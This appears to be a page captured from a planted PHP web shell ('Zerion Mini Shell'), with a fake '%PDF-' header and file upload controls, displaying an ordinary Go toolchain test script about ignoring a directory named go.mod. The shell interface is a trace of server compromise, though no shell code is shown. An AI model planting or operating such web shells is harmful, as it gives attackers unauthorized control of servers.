%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /usr/local/go/src/cmd/go/testdata/script/
Upload File :
Create Path :
Current File : //usr/local/go/src/cmd/go/testdata/script/mod_dir.txt

# The directory named go.mod should be ignored

env GO111MODULE=on

cd $WORK/sub

go list .
stdout 'x/sub'

mkdir go.mod
exists go.mod

go list .
stdout 'x/sub'

-- $WORK/go.mod --
module x

-- $WORK/sub/x.go --
package x

Zerion Mini Shell 1.0